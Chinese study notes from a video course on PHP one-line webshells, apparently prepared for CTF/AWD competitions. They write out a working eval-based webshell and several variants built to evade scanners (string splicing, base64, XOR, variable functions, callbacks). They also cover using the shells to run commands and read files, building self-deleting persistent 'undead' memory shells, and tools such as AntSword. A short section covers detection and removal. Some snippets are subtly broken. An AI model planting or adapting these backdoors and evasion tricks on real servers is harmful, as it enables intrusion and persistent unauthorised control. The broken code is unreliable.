课程:https://www.bilibili.com/video/BV1VA411u7Tg?p=7
一句话木马
可执行脚本文件
可以是很多种语言php、jsp等等
需要满足三个条件:木马能成功上传到服务器、我们知道木马上传到服务器的路径、上传的木马能被解析执行。
例如
<?php @eval($_POST['cmd']);?>
@是不报错的意思
以post方法获取cmd变量
eval()将括号里的按php代码执行
例如,传入cmd=phpinfo();
,那么最后执行的就是<?php @eval("phpinfo();");?>
phpinfo()会得到当前php的大量信息,包括环境变量、服务器信息、php版本等
浏览器可以使用hackbar插件用来提交数据,先把url加载出来,点击post data,将要传入的cmd=phpinfo();
写入,点击Execute执行
想执行命令的话,用PHP的命令执行函数例如,输入cmd=system(whoami);
eval()函数有时候可以被assert代替,因为eval函数不支持动态调用
动态调用例子:<?php @a="phpinfo";@a(); ?>
注:php7.1将assert废弃了
木马的变形
传统防护检测的免杀方法
隐藏关键字
例如,绕过<?的限制<script language="php">@eval($_POST['x'])</script>
差分拼接
<?php
$arr=explode(",","a,s,d,f,s,d,e,k,r,t");//把字符串打散为数组
$payload=$arr[0].$arr[1].$arr[4].$arr[6].$arr[8].$arr[9];//拼接成assert
//php版本要求:<=7.0
@$payload(@$_GET['x']);
?>
编码的方式
<?php
$a=base64_decode("YXNzZXJ0");
$@a($_POST('cmd'));
?>
随机异或,用异或运算来组成字符
<?php
//也可以用十六进制进行进一步加密,例如
//$r="x4d"^"x3f"
$a="Y"^"8";//a
$b="T"^"";//s
$c="*"^"O";//e
$d="M"^"?";//r
$e="-"^"Y";//t
$payload(@$_POST['x']);
?>
可变函数
<?php
@$_REQUEST['e'](@$_REQUEST['x']);
//传入e=assert&x=command命令
?>
与POST、GET不同的REQUEST():通过post和get传递的参数通过request都能获取到
可变变量
<?php
$a='assert';
$b='a';
//$$b=$a='assert'
$$b($_POST['x']);
//assert($_POST['x'])
?>
使用回调函数
例如call_user_func($callback,$parameter)
其中参数$callback
指被调用的回调函数,$parameter
表示0个或以上的参数,被传入回调函数。
例
<?php
@call_user_func($_GET['id'],$_POST['a']);
//传入id=eval&a=command
?>
还有好多其他的回调函数
php手册中可以搜索called等关键字查询
木马的使用
执行系统的命令
system()执行外部程序,并显示输出
passthru()执行外部程序并且显示原始输出
exec()执行一个外部程序,不输出结果,echo也只返回结果最后一行
shell_exec()或者’ ’ 通过shell环境执行命令,需要echo返回打印(全部结果)
读文件
file_get_contents 将整个文件读入为一个字符串,用echo打印
file()把整个文件读入一个数组中,数组应var_dump函数输出
readfile读取一个文件,并写入输出缓冲,不需要echo就可以输出
遍历目录
scandir()函数返回一个制定目录中的文件和目录的数组
木马特种与查杀(AWD)
特征检测,检测敏感关键字,如:危险函数、特殊函数
工具:D盾
一些会被认为是木马的特征函数:
代码执行函数:eval、assert、per_replace(正则替换的函数)、create_function(创造匿名函数)、回调函数(call_user_func、call_user_func_array、等)
命令执行函数:shell_exec()、proc_open()执行一个命令并打开用来输入输出的文件指针、popen()通过参数传递一条命令并对popen打开的文件执行、等
文件操作函数:file_get_countents将整个文件读入为一个字符串、file_put_contents将一个字符串写入文件、file()把整个文件读入一个数组中、fopen打开文件或者URL、rename重命名一个文件或目录、等
包含函数:require、require_once、include、include_once
特殊函数:phpinfo、变量覆盖(parse_str、extract)、等
D盾查杀
可以扫描到一些可疑函数,但并不能确定
不死马
是内存马,它无文件,但程序会永久的与运行在PHP进程中,无限执行,很隐藏不易被发现,也不容易被删除
例如
ignore_user_abort(true):此函数用来设置客户机断开后是否会终止脚本的执行,设置成true,客户机断开后脚本仍然会执行。
set_time_limit(0):设置脚本最大执行时间,设为0表示没有限制。
unlink(_FILE _):删除文件本身,起到隐藏自身的作用。
usleep():延迟执行当前脚本若干微妙。
注意,pass参数使用了MD5加密,防止木马被他人利用。
不死马的查杀
1.重启服务,比如php等web服务。
2.创建一个和不死马同名的文件夹。
3.删除相应进程。查出不死马进程PID后,用命令kill-9 PID杀掉进程。
4.竞争写入删除不死马的文件,usleep的事件必须要小于不死马的延迟时间才会有效。
菜刀蚁剑使用介绍
小马:短小精悍,比如一句话木马,但实现的功能少;
大马:脚本大小会比较庞大,但它能实现更复杂的功能;
可以先传小马,在利用小马执行大马
利用菜刀、蚁剑等工具可以一键实现
用蚁剑抓包,其中cmd连接密码,随即参数传递真实命令
不一定要使用base64编码,可以是其他编码